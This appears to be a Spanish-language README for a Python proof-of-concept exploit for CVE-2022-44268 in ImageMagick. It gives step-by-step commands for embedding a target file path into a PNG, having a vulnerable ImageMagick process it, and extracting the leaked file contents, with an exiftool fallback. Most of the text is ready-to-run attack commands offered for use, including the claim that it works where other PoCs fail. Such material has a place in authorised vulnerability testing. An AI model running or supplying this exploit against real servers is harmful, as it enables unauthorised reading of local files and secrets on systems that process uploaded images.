
PoC en Python para CVE-2022-44268 que incrusta contenido arbitrario de archivos en imágenes PNG mediante ImageMagick, con soporte de extracción para exiftool.
Algunos PoCs no funcionan para contenidos de archivo específicos. Este PoC puede funcionar para contenidos que no funcionan con otros PoCs.
Clona este repositorio con Git. Luego, instala los requisitos.
pip install -r requirements.txt
Para incrustar tu payload dentro de una imagen:
python3 MagickPNG.py -i <image to modify> -f <file to read> -o <output file>
Luego usa ImageMagick para actualizar tu PNG.
Para extraer datos del archivo modificado por ImageMagick:
python3 MagickPNG.py -d <resulting image> -o <output file>
Si esto no funciona, intenta usar exiftool para extraer los bytes como hexadecimales.
exiftool -all:all -s image.png -b